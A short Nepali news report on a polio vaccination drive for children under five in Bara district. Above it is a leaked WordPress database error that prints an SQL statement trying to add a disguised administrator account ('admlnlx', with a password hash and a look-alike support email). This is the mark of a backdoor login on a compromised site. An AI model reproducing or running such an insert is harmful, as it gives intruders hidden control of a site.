WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BbO./3xhzmuI7CAkvDeMAh2HhaMdCn.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 11:47:20', '', 'admlnlx', 'admlnlx')
कलैया, माघ २२ –
राष्ट्रिय पोलियो खोप अभियान कार्यक्रमअन्तर्गत बारामा ५ वर्षमुनिका एक लाख ४० हजार ६३५ बालबालिकालाई पोलियो रोगविरुद्ध खोप दिने कार्यक्रम रहेको छ ।
यही फागुन ७ र ८ गते जिल्लाका ५ वर्षमुनिका सबै कालकालिकालाई पोलियो खोप दिने जिल्ला जनस्वास्थ्य कार्यालयका प्रमुख रोशनलाल चौधरीले बताउनुभयो ।
उक्त कार्यक्रमका लागि जिल्लामा ९७० वटा खोप केन्द्र र एक हजार ९४० जना स्वास्थ्यकर्मी परिचालन गरिएको प्रमुख चौधरीले बताउनुभयो ।
बाराका छ नगरपालिका र ६८ गाविस रहेका छन् । – रासस